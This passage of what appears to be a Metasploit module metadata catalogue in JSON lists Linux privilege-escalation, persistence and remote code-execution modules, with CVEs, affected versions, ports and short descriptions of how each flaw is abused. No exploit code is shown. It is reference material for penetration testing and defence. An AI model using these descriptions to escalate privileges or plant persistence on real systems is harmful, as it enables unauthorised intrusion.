"full_name": "exploit/linux/local/rds_priv_esc",
"rank": 500,
"disclosure_date": "2010-10-20",
"type": "exploit",
"author": [
"Dan Rosenberg",
"bcoles <bcoles@gmail.com>"
],
"description": "This module exploits a vulnerability in the rds_page_copy_user function\n in net/rds/page.c (RDS) in Linux kernel versions 2.6.30 to 2.6.36-rc8\n to execute code as root (CVE-2010-3904).\n\n This module has been tested successfully on Fedora 13 (i686) with\n kernel version 2.6.33.3-85.fc13.i686.PAE and Ubuntu 10.04 (x86_64)\n with kernel version 2.6.32-21-generic.",
"references": [
"EDB-15285",
"CVE-2010-3904",
"BID-44219",
"URL-https://securitytracker.com/id?1024613",
"URL-https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=799c10559d60f159ab2232203f222f18fa3c4a5f",
"URL-http://vulnfactory.org/exploits/rds-fail.c",
"URL-http://web.archive.org/web/20101020044047/http://www.vsecurity.com/resources/advisory/20101019-1/",
"URL-http://web.archive.org/web/20101020044048/http://www.vsecurity.com/download/tools/linux-rds-exploit.c"
],
"platform": "Linux",
"arch": "x86, x64",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Auto"
],
"mod_time": "2019-01-10 19:19:14 +0000",
"path": "/modules/exploits/linux/local/rds_priv_esc.rb",
"is_install_path": true,
"ref_name": "linux/local/rds_priv_esc",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
"AKA": [
"rds-fail.c"
]
}
},
"exploit_linux/local/recvmmsg_priv_esc": {
"name": "Linux Kernel recvmmsg Privilege Escalation",
"full_name": "exploit/linux/local/recvmmsg_priv_esc",
"rank": 400,
"disclosure_date": "2014-02-02",
"type": "exploit",
"author": [
"h00die <mike@shorebreaksecurity.com>",
"rebel"
],
"description": "This module attempts to exploit CVE-2014-0038, by sending a recvmmsg\n system call with a crafted timeout pointer parameter to gain root.\n\n This exploit has offsets for 3 Ubuntu 13 kernels:\n 3.8.0-19-generic (13.04 default);\n 3.11.0-12-generic (13.10 default);\n 3.11.0-15-generic (13.10).\n\n This exploit may take up to 13 minutes to run due to a decrementing\n (1/sec) pointer which starts at 0xff*3 (765 seconds)",
"references": [
"BID-65255",
"CVE-2014-0038",
"EDB-31347",
"EDB-31346",
"URL-https://bugs.launchpad.net/ubuntu/+source/apport/+bug/1453900"
],
"platform": "Linux",
"arch": "x86, x64",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Auto"
],
"mod_time": "2018-12-16 14:11:54 +0000",
"path": "/modules/exploits/linux/local/recvmmsg_priv_esc.rb",
"is_install_path": true,
"ref_name": "linux/local/recvmmsg_priv_esc",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/local/service_persistence": {
"name": "Service Persistence",
"full_name": "exploit/linux/local/service_persistence",
"rank": 600,
"disclosure_date": "1983-01-01",
"type": "exploit",
"author": [
"h00die <mike@shorebreaksecurity.com>",
"Cale Black"
],
"description": "This module will create a service on the box, and mark it for auto-restart.\n We need enough access to write service files and potentially restart services\n Targets:\n System V:\n CentOS <= 5\n Debian <= 6\n Kali 2.0\n Ubuntu <= 9.04\n Upstart:\n CentOS 6\n Fedora >= 9, < 15\n Ubuntu >= 9.10, <= 14.10\n systemd:\n CentOS 7\n Debian >= 7, <=8\n Fedora >= 15\n Ubuntu >= 15.04\n Note: System V won't restart the service if it dies, only an init change (reboot etc) will restart it.",
"references": [
"URL-https://www.digitalocean.com/community/tutorials/how-to-configure-a-linux-service-to-start-automatically-after-a-crash-or-reboot-part-1-practical-examples"
],
"platform": "Linux,Unix",
"arch": "cmd",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Auto",
"System V",
"Upstart",
"systemd",
"systemd user"
],
"mod_time": "2019-03-06 00:07:17 +0000",
"path": "/modules/exploits/linux/local/service_persistence.rb",
"is_install_path": true,
"ref_name": "linux/local/service_persistence",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/local/sock_sendpage": {
"name": "Linux Kernel Sendpage Local Privilege Escalation",
"full_name": "exploit/linux/local/sock_sendpage",
"rank": 500,
"disclosure_date": "2009-08-13",
"type": "exploit",
"author": [
"Tavis Ormandy",
"Julien Tinnes <julien at cr0.org>",
"spender",
"rcvalle",
"egypt <egypt@metasploit.com>"
],
"description": "The Linux kernel failed to properly initialize some entries in the\n proto_ops struct for several protocols, leading to NULL being\n dereferenced and used as a function pointer. By using mmap(2) to map\n page 0, an attacker can execute arbitrary code in the context of the\n kernel.\n\n Several public exploits exist for this vulnerability, including\n spender's wunderbar_emporium and rcvalle's ppc port, sock_sendpage.c.\n\n All Linux 2.4/2.6 versions since May 2001 are believed to be affected:\n 2.4.4 up to and including 2.4.37.4; 2.6.0 up to and including 2.6.30.4\n\n This module has been tested successfully on CentOS 5.0 (i386) with\n kernel version 2.6.18-8.1.1.tl5; and Debian 3.1r8 Sarge (i686) with\n kernel version 2.4.27-3-386.",
"references": [
"CVE-2009-2692",
"EDB-9545",
"EDB-9641",
"BID-36038",
"URL-https://www.securityfocus.com/archive/1/505751",
"URL-http://blog.cr0.org/2009/08/linux-null-pointer-dereference-due-to.html"
],
"platform": "Linux",
"arch": "x86",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Linux x86"
],
"mod_time": "2018-11-11 09:37:56 +0000",
"path": "/modules/exploits/linux/local/sock_sendpage.rb",
"is_install_path": true,
"ref_name": "linux/local/sock_sendpage",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/local/sophos_wpa_clear_keys": {
"name": "Sophos Web Protection Appliance clear_keys.pl Local Privilege Escalation",
"full_name": "exploit/linux/local/sophos_wpa_clear_keys",
"rank": 600,
"disclosure_date": "2013-09-06",
"type": "exploit",
"author": [
"Francisco Falcon",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module abuses a command injection on the clear_keys.pl perl script, installed with the\n Sophos Web Protection Appliance, to escalate privileges from the \"spiderman\" user to \"root\".\n This module is useful for post exploitation of vulnerabilities on the Sophos Web Protection\n Appliance web ui, executed by the \"spiderman\" user. This module has been tested successfully\n on Sophos Virtual Web Appliance 3.7.0.",
"references": [
"CVE-2013-4984",
"OSVDB-97028",
"BID-62265",
"URL-http://www.coresecurity.com/advisories/sophos-web-protection-appliance-multiple-vulnerabilities"
],
"platform": "Linux",
"arch": "x86",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Linux x86"
],
"mod_time": "2018-10-10 14:12:29 +0000",
"path": "/modules/exploits/linux/local/sophos_wpa_clear_keys.rb",
"is_install_path": true,
"ref_name": "linux/local/sophos_wpa_clear_keys",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/local/systemtap_modprobe_options_priv_esc": {
"name": "SystemTap MODPROBE_OPTIONS Privilege Escalation",
"full_name": "exploit/linux/local/systemtap_modprobe_options_priv_esc",
"rank": 600,
"disclosure_date": "2010-11-17",
"type": "exploit",
"author": [
"Tavis Ormandy",
"bcoles <bcoles@gmail.com>"
],
"description": "This module attempts to gain root privileges by exploiting a\n vulnerability in the `staprun` executable included with SystemTap\n version 1.3.\n\n The `staprun` executable does not clear environment variables prior to\n executing `modprobe`, allowing an arbitrary configuration file to be\n specified in the `MODPROBE_OPTIONS` environment variable, resulting\n in arbitrary command execution with root privileges.\n\n This module has been tested successfully on:\n\n systemtap 1.2-1.fc13-i686 on Fedora 13 (i686); and\n systemtap 1.1-3.el5 on RHEL 5.5 (x64).",
"references": [
"BID-44914",
"CVE-2010-4170",
"EDB-15620",
"URL-https://securitytracker.com/id?1024754",
"URL-https://access.redhat.com/security/cve/cve-2010-4170",
"URL-https://bugzilla.redhat.com/show_bug.cgi?id=653604",
"URL-https://lists.fedoraproject.org/pipermail/package-announce/2010-November/051115.html",
"URL-https://bugs.launchpad.net/bugs/677226",
"URL-https://www.debian.org/security/2011/dsa-2348"
],
"platform": "Linux",
"arch": "x86, x64, armle, aarch64, ppc, mipsle, mipsbe",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Auto"
],
"mod_time": "2019-04-19 12:54:30 +0000",
"path": "/modules/exploits/linux/local/systemtap_modprobe_options_priv_esc.rb",
"is_install_path": true,
"ref_name": "linux/local/systemtap_modprobe_options_priv_esc",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/local/udev_netlink": {
"name": "Linux udev Netlink Local Privilege Escalation",
"full_name": "exploit/linux/local/udev_netlink",
"rank": 500,
"disclosure_date": "2009-04-16",
"type": "exploit",
"author": [
"kcope",
"Jon Oberheide",
"egypt <egypt@metasploit.com>"
],
"description": "Versions of udev < 1.4.1 do not verify that netlink messages are\n coming from the kernel. This allows local users to gain privileges by\n sending netlink messages from userland.",
"references": [
"CVE-2009-1185",
"OSVDB-53810",
"BID-34536"
],
"platform": "Linux",
"arch": "x86, x64",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Linux x86",
"Linux x64"
],
"mod_time": "2018-10-10 14:12:29 +0000",
"path": "/modules/exploits/linux/local/udev_netlink.rb",
"is_install_path": true,
"ref_name": "linux/local/udev_netlink",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/local/ueb_bpserverd_privesc": {
"name": "Unitrends Enterprise Backup bpserverd Privilege Escalation",
"full_name": "exploit/linux/local/ueb_bpserverd_privesc",
"rank": 600,
"disclosure_date": "2018-03-14",
"type": "exploit",
"author": [
"Cale Smith",
"Benny Husted",
"Jared Arave",
"h00die"
],
"description": "It was discovered that the Unitrends bpserverd proprietary protocol, as exposed via xinetd,\n has an issue in which its authentication can be bypassed. A remote attacker could use this\n issue to execute arbitrary commands with root privilege on the target system.\n This is very similar to exploits/linux/misc/ueb9_bpserverd however it runs against the\n localhost by dropping a python script on the local file system. Unitrends stopped\n bpserverd from listening remotely on version 10.",
"references": [
"URL-https://support.unitrends.com/UnitrendsBackup/s/article/000005691",
"URL-http://blog.redactedsec.net/exploits/2018/04/20/UEB9_tcp.html",
"EDB-44297",
"CVE-2018-6329"
],
"platform": "Linux",
"arch": "x86",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"UEB <= 10.0"
],
"mod_time": "2018-11-27 21:18:05 +0000",
"path": "/modules/exploits/linux/local/ueb_bpserverd_privesc.rb",
"is_install_path": true,
"ref_name": "linux/local/ueb_bpserverd_privesc",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/local/ufo_privilege_escalation": {
"name": "Linux Kernel UDP Fragmentation Offset (UFO) Privilege Escalation",
"full_name": "exploit/linux/local/ufo_privilege_escalation",
"rank": 400,
"disclosure_date": "2017-08-10",
"type": "exploit",
"author": [
"Andrey Konovalov",
"h00die",
"bcoles <bcoles@gmail.com>"
],
"description": "This module attempts to gain root privileges on Linux systems by abusing\n UDP Fragmentation Offload (UFO).\n\n This exploit targets only systems using Ubuntu (Trusty / Xenial) kernels\n 4.4.0-21 <= 4.4.0-89 and 4.8.0-34 <= 4.8.0-58, including Linux distros\n based on Ubuntu, such as Linux Mint.\n\n The target system must have unprivileged user namespaces enabled\n and SMAP disabled.\n\n Bypasses for SMEP and KASLR are included. Failed exploitation\n may crash the kernel.\n\n This module has been tested successfully on various Ubuntu and Linux\n Mint systems, including:\n\n Ubuntu 14.04.5 4.4.0-31-generic x64 Desktop;\n Ubuntu 16.04 4.8.0-53-generic;\n Linux Mint 17.3 4.4.0-89-generic;\n Linux Mint 18 4.8.0-58-generic",
"references": [
"CVE-2017-1000112",
"EDB-43418",
"BID-100262",
"URL-https://seclists.org/oss-sec/2017/q3/277",
"URL-https://github.com/xairy/kernel-exploits/blob/master/CVE-2017-1000112/poc.c",
"URL-https://git.kernel.org/pub/scm/linux/kernel/git/davem/net.git/commit/?id=85f1bd9a7b5a79d5baa8bf44af19658f7bf77bfa",
"URL-https://people.canonical.com/~ubuntu-security/cve/CVE-2017-1000112",
"URL-https://securingtomorrow.mcafee.com/mcafee-labs/linux-kernel-vulnerability-can-lead-to-privilege-escalation-analyzing-cve-2017-1000112/",
"URL-https://ricklarabee.blogspot.com/2017/12/adapting-poc-for-cve-2017-1000112-to.html",
"URL-https://github.com/bcoles/kernel-exploits/commits/cve-2017-1000112"
],
"platform": "Linux",
"arch": "x64",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Auto"
],
"mod_time": "2019-01-10 19:19:14 +0000",
"path": "/modules/exploits/linux/local/ufo_privilege_escalation.rb",
"is_install_path": true,
"ref_name": "linux/local/ufo_privilege_escalation",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/local/vmware_alsa_config": {
"name": "VMware Workstation ALSA Config File Local Privilege Escalation",
"full_name": "exploit/linux/local/vmware_alsa_config",
"rank": 600,
"disclosure_date": "2017-05-22",
"type": "exploit",
"author": [
"Jann Horn",
"bcoles <bcoles@gmail.com>"
],
"description": "This module exploits a vulnerability in VMware Workstation Pro and\n Player on Linux which allows users to escalate their privileges by\n using an ALSA configuration file to load and execute a shared object\n as root when launching a virtual machine with an attached sound card.\n\n This module has been tested successfully on VMware Player version\n 12.5.0 on Debian Linux 8 Jessie.",
"references": [
"CVE-2017-4915",
"EDB-42045",
"BID-98566",
"URL-https://www.securitytracker.com/id/1038525",
"URL-https://gist.github.com/bcoles/cd26a831473088afafefc93641e184a9",
"URL-https://www.vmware.com/security/advisories/VMSA-2017-0009.html",
"URL-https://bugs.chromium.org/p/project-zero/issues/detail?id=1142"
],
"platform": "Linux",
"arch": "x86, x64",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Linux x86",
"Linux x64"
],
"mod_time": "2019-01-10 19:19:14 +0000",
"path": "/modules/exploits/linux/local/vmware_alsa_config.rb",
"is_install_path": true,
"ref_name": "linux/local/vmware_alsa_config",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/local/vmware_mount": {
"name": "VMWare Setuid vmware-mount Unsafe popen(3)",
"full_name": "exploit/linux/local/vmware_mount",
"rank": 600,
"disclosure_date": "2013-08-22",
"type": "exploit",
"author": [
"Tavis Ormandy",
"egypt <egypt@metasploit.com>"
],
"description": "VMWare Workstation (up to and including 9.0.2 build-1031769)\n and Player have a setuid executable called vmware-mount that\n invokes lsb_release in the PATH with popen(3). Since PATH is\n user-controlled, and the default system shell on\n Debian-derived distributions does not drop privs, we can put\n an arbitrary payload in an executable called lsb_release and\n have vmware-mount happily execute it as root for us.",
"references": [
"CVE-2013-1662",
"OSVDB-96588",
"BID-61966",
"URL-http://blog.cmpxchg8b.com/2013/08/security-debianisms.html",
"URL-http://www.vmware.com/support/support-resources/advisories/VMSA-2013-0010.html",
"URL-https://community.rapid7.com/community/metasploit/blog/2013/09/05/cve-2013-1662-vmware-mount-exploit"
],
"platform": "Linux",
"arch": "x86",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic"
],
"mod_time": "2018-10-10 14:35:34 +0000",
"path": "/modules/exploits/linux/local/vmware_mount.rb",
"is_install_path": true,
"ref_name": "linux/local/vmware_mount",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/local/yum_package_manager_persistence": {
"name": "Yum Package Manager Persistence",
"full_name": "exploit/linux/local/yum_package_manager_persistence",
"rank": 600,
"disclosure_date": "2003-12-17",
"type": "exploit",
"author": [
"Aaron Ringo"
],
"description": "This module will run a payload when the package manager is used. No\n handler is ran automatically so you must configure an appropriate\n exploit/multi/handler to connect. Module modifies a yum plugin to\n launch a binary of choice. grep -F 'enabled=1' /etc/yum/pluginconf.d/\n will show what plugins are currently enabled on the system.",
"references": [
],
"platform": "Linux,Unix",
"arch": "cmd, x86, x64, armle, aarch64, ppc, mipsle, mipsbe",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic"
],
"mod_time": "2019-04-30 06:25:48 +0000",
"path": "/modules/exploits/linux/local/yum_package_manager_persistence.rb",
"is_install_path": true,
"ref_name": "linux/local/yum_package_manager_persistence",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/local/zpanel_zsudo": {
"name": "ZPanel zsudo Local Privilege Escalation Exploit",
"full_name": "exploit/linux/local/zpanel_zsudo",
"rank": 600,
"disclosure_date": "2013-06-07",
"type": "exploit",
"author": [
"sinn3r <sinn3r@metasploit.com>",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module abuses the zsudo binary, installed with zpanel, to escalate\n privileges. In order to work, a session with access to zsudo on the sudoers\n configuration is needed. This module is useful for post exploitation of ZPanel\n vulnerabilities, where typically web server privileges are acquired, and this\n user is allowed to execute zsudo on the sudoers file.",
"references": [
],
"platform": "Linux,Unix",
"arch": "cmd, x86",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Command payload",
"Linux x86"
],
"mod_time": "2018-10-10 14:39:07 +0000",
"path": "/modules/exploits/linux/local/zpanel_zsudo.rb",
"is_install_path": true,
"ref_name": "linux/local/zpanel_zsudo",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/misc/accellion_fta_mpipe2": {
"name": "Accellion FTA MPIPE2 Command Execution",
"full_name": "exploit/linux/misc/accellion_fta_mpipe2",
"rank": 600,
"disclosure_date": "2011-02-07",
"type": "exploit",
"author": [
"hdm <x@hdm.io>"
],
"description": "This module exploits a chain of vulnerabilities in the Accellion\n File Transfer appliance. This appliance exposes a UDP service on\n port 8812 that acts as a gateway to the internal communication bus.\n This service uses Blowfish encryption for authentication, but the\n appliance ships with two easy to guess default authentication keys.\n This module abuses the known default encryption keys to inject a\n message into the communication bus. In order to execute arbitrary\n commands on the remote appliance, a message is injected into the bus\n destined for the 'matchrep' service. This service exposes a function\n named 'insert_plugin_meta_info' which is vulnerable to an input\n validation flaw in a call to system(). This provides access to the\n 'soggycat' user account, which has sudo privileges to run the\n primary admin tool as root. These two flaws are fixed in update\n version FTA_8_0_562.",
"references": [
"OSVDB-71362",
"OSVDB-71363",
"URL-http://www.rapid7.com/security-center/advisories/R7-0039.jsp"
],
"platform": "Unix",
"arch": "cmd",
"rport": 8812,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/linux/misc/accellion_fta_mpipe2.rb",
"is_install_path": true,
"ref_name": "linux/misc/accellion_fta_mpipe2",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/misc/asus_infosvr_auth_bypass_exec": {
"name": "ASUS infosvr Auth Bypass Command Execution",
"full_name": "exploit/linux/misc/asus_infosvr_auth_bypass_exec",
"rank": 600,
"disclosure_date": "2015-01-04",
"type": "exploit",
"author": [
"Friedrich Postelstorfer",
"jduck <jduck@metasploit.com>",
"bcoles <bcoles@gmail.com>"
],
"description": "This module exploits an authentication bypass vulnerability in the\n infosvr service running on UDP port 9999 on various ASUS routers to\n execute arbitrary commands as root.\n\n This module launches the BusyBox Telnet daemon on the port specified\n in the TelnetPort option to gain an interactive remote shell.\n\n This module was tested successfully on an ASUS RT-N12E with firmware\n version 2.0.0.35.\n\n Numerous ASUS models are reportedly affected, but untested.",
"references": [
"CVE-2014-9583",
"EDB-35688",
"URL-https://github.com/jduck/asus-cmd"
],
"platform": "Unix",
"arch": "cmd",
"rport": 9999,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic"
],
"mod_time": "2019-01-10 19:19:14 +0000",
"path": "/modules/exploits/linux/misc/asus_infosvr_auth_bypass_exec.rb",
"is_install_path": true,
"ref_name": "linux/misc/asus_infosvr_auth_bypass_exec",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/misc/drb_remote_codeexec": {
"name": "Distributed Ruby Remote Code Execution",
"full_name": "exploit/linux/misc/drb_remote_codeexec",
"rank": 600,
"disclosure_date": "2011-03-23",
"type": "exploit",
"author": [
"joernchen <joernchen@phenoelit.de>"
],
"description": "This module exploits remote code execution vulnerabilities in dRuby.",
"references": [
"URL-http://www.ruby-doc.org/stdlib-1.9.3/libdoc/drb/rdoc/DRb.html",
"URL-http://blog.recurity-labs.com/archives/2011/05/12/druby_for_penetration_testers/",
"URL-http://bugkraut.de/posts/tainting"
],
"platform": "Unix",
"arch": "cmd",
"rport": 8787,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic",
"Trap",
"Eval",
"Syscall"
],
"mod_time": "2017-11-30 10:51:02 +0000",
"path": "/modules/exploits/linux/misc/drb_remote_codeexec.rb",
"is_install_path": true,
"ref_name": "linux/misc/drb_remote_codeexec",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/misc/gld_postfix": {
"name": "GLD (Greylisting Daemon) Postfix Buffer Overflow",
"full_name": "exploit/linux/misc/gld_postfix",
"rank": 400,
"disclosure_date": "2005-04-12",
"type": "exploit",
"author": [
"aushack <patrick@osisecurity.com.au>"
],
"description": "This module exploits a stack buffer overflow in the Salim Gasmi\n GLD <= 1.4 greylisting daemon for Postfix. By sending an\n overly long string the stack can be overwritten.",
"references": [
"CVE-2005-1099",
"OSVDB-15492",
"BID-13129",
"EDB-934"
],
"platform": "Linux",
"arch": "x86",
"rport": 2525,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"RedHat Linux 7.0 (Guinness)"
],
"mod_time": "2017-11-09 03:00:24 +0000",
"path": "/modules/exploits/linux/misc/gld_postfix.rb",
"is_install_path": true,
"ref_name": "linux/misc/gld_postfix",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/misc/hid_discoveryd_command_blink_on_unauth_rce": {
"name": "HID discoveryd command_blink_on Unauthenticated RCE",
"full_name": "exploit/linux/misc/hid_discoveryd_command_blink_on_unauth_rce",
"rank": 600,
"disclosure_date": "2016-03-28",
"type": "exploit",
"author": [
"Ricky \"HeadlessZeke\" Lawshae",
"coldfusion39",
"bcoles <bcoles@gmail.com>"
],
"description": "This module exploits an unauthenticated remote command execution\n vulnerability in the discoveryd service exposed by HID VertX and Edge\n door controllers.\n\n This module was tested successfully on a HID Edge model EH400\n with firmware version 2.3.1.603 (Build 04/23/2012).",
"references": [
"ZDI-16-223",
"URL-https://blog.trendmicro.com/let-get-door-remote-root-vulnerability-hid-door-controllers/",
"URL-http://nosedookie.blogspot.com/2011/07/identifying-and-querying-hid-vertx.html",
"URL-https://exfil.co/2016/05/09/exploring-the-hid-eh400/",
"URL-https://github.com/lixmk/Concierge",
"URL-https://github.com/coldfusion39/VertXploit"
],
"platform": "Linux",
"arch": "armle",
"rport": 4070,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic"
],
"mod_time": "2019-01-10 19:19:14 +0000",
"path": "/modules/exploits/linux/misc/hid_discoveryd_command_blink_on_unauth_rce.rb",
"is_install_path": true,
"ref_name": "linux/misc/hid_discoveryd_command_blink_on_unauth_rce",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/misc/hikvision_rtsp_bof": {
"name": "Hikvision DVR RTSP Request Remote Code Execution",
"full_name": "exploit/linux/misc/hikvision_rtsp_bof",
"rank": 300,
"disclosure_date": "2014-11-19",
"type": "exploit",
"author": [
"Mark Schloesser <mark_schloesser@rapid7.com>"
],
"description": "This module exploits a buffer overflow in the RTSP request parsing\n code of Hikvision DVR appliances. The Hikvision DVR devices record\n video feeds of surveillance cameras and offer remote administration\n and playback of recorded footage.\n\n The vulnerability is present in several models / firmware versions\n but due to the available test device this module only supports\n the DS-7204 model.",
"references": [
"CVE-2014-4880",
"URL-https://community.rapid7.com/community/metasploit/blog/2014/11/19/r7-2014-18-hikvision-dvr-devices--multiple-vulnerabilities"
],
"platform": "Linux",
"arch": "armle",
"rport": 554,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"DS-7204 Firmware V2.2.10 build 131009",
"Debug Target"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/linux/misc/hikvision_rtsp_bof.rb",
"is_install_path": true,
"ref_name": "linux/misc/hikvision_rtsp_bof",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/misc/hp_data_protector_cmd_exec": {
"name": "HP Data Protector 6 EXEC_CMD Remote Code Execution",
"full_name": "exploit/linux/misc/hp_data_protector_cmd_exec",
"rank": 600,
"disclosure_date": "2011-02-07",
"type": "exploit",
"author": [
"ch0ks",
"c4an",
"wireghoul",
"Javier Ignacio"
],
"description": "This exploit abuses a vulnerability in the HP Data Protector service. This\n flaw allows an unauthenticated attacker to take advantage of the EXEC_CMD\n command and traverse back to /bin/sh, this allows arbitrary remote code\n execution under the context of root.",
"references": [
"CVE-2011-0923",
"OSVDB-72526",
"ZDI-11-055",
"URL-http://hackarandas.com/blog/2011/08/04/hp-data-protector-remote-shell-for-hpux",
"URL-https://community.rapid7.com/thread/2253"
],
"platform": "Linux,Unix",
"arch": "cmd",
"rport": 5555,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"HP Data Protector 6.10/6.11/6.20 on Linux"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/linux/misc/hp_data_protector_cmd_exec.rb",
"is_install_path": true,
"ref_name": "linux/misc/hp_data_protector_cmd_exec",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/misc/hp_jetdirect_path_traversal": {
"name": "HP Jetdirect Path Traversal Arbitrary Code Execution",
"full_name": "exploit/linux/misc/hp_jetdirect_path_traversal",
"rank": 300,
"disclosure_date": "2017-04-05",
"type": "exploit",
"author": [
"Jacob Baines",
"Matthew Kienow <matthew_kienow[AT]rapid7.com>"
],
"description": "The module exploits a path traversal via Jetdirect to gain arbitrary code execution by\n writing a shell script that is loaded on startup to /etc/profile.d. Then, the printer\n is restarted using SNMP. Impacted printers:\n HP PageWide Managed MFP P57750dw\n HP PageWide Managed P55250dw\n HP PageWide Pro MFP 577z\n HP PageWide Pro 552dw\n HP PageWide Pro MFP 577dw\n HP PageWide Pro MFP 477dw\n HP PageWide Pro 452dw\n HP PageWide Pro MFP 477dn\n HP PageWide Pro 452dn\n HP PageWide MFP 377dw\n HP PageWide 352dw\n HP OfficeJet Pro 8730 All-in-One Printer\n HP OfficeJet Pro 8740 All-in-One Printer\n HP OfficeJet Pro 8210 Printer\n HP OfficeJet Pro 8216 Printer\n HP OfficeJet Pro 8218 Printer\n\n Please read the module documentation regarding the possibility for leaving an\n unauthenticated telnetd service running as a side effect of this exploit.",
"references": [
"CVE-2017-2741",
"URL-https://support.hp.com/lt-en/document/c05462914",
"URL-http://tenable.com/blog/rooting-a-printer-from-security-bulletin-to-remote-code-execution"
],
"platform": "",
"arch": "",
"rport": 9100,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Unix (In-Memory)"
],
"mod_time": "2018-08-23 15:50:41 +0000",
"path": "/modules/exploits/linux/misc/hp_jetdirect_path_traversal.rb",
"is_install_path": true,
"ref_name": "linux/misc/hp_jetdirect_path_traversal",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/misc/hp_nnmi_pmd_bof": {
"name": "HP Network Node Manager I PMD Buffer Overflow",
"full_name": "exploit/linux/misc/hp_nnmi_pmd_bof",
"rank": 300,
"disclosure_date": "2014-09-09",
"type": "exploit",
"author": [
"d(-_-)b",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in HP Network Node Manager I (NNMi). The\n vulnerability exists in the pmd service, due to the insecure usage of functions like\n strcpy and strcat while handling stack_option packets with user controlled data. In\n order to bypass ASLR this module uses a proto_tbl packet to leak an libov pointer from\n the stack and finally build the ROP chain to avoid NX.",
"references": [
"CVE-2014-2624",
"ZDI-14-305"
],
"platform": "Unix",
"arch": "cmd",
"rport": 7426,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic",
"HP NNMi 9.10 / CentOS 5",
"HP NNMi 9.20 / CentOS 6"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/linux/misc/hp_nnmi_pmd_bof.rb",
"is_install_path": true,
"ref_name": "linux/misc/hp_nnmi_pmd_bof",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/misc/hp_vsa_login_bof": {
"name": "HP StorageWorks P4000 Virtual SAN Appliance Login Buffer Overflow",
"full_name": "exploit/linux/misc/hp_vsa_login_bof",
"rank": 300,
"disclosure_date": "2013-06-28",
"type": "exploit",
"author": [
"e6af8de8b1d4b2b6d5ba2610cbf9cd38",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a buffer overflow vulnerability found in HP's StorageWorks\n P4000 VSA on versions prior to 10.0. The vulnerability is due to an insecure usage\n of the sscanf() function when parsing login requests. This module has been tested\n successfully on the HP VSA 9 Virtual Appliance.",
"references": [
"CVE-2013-2343",
"OSVDB-94701",
"ZDI-13-179",
"URL-http://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c03661318"
],
"platform": "Linux",
"arch": "x86",
"rport": 13838,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"HP VSA 9"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/linux/misc/hp_vsa_login_bof.rb",
"is_install_path": true,
"ref_name": "linux/misc/hp_vsa_login_bof",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
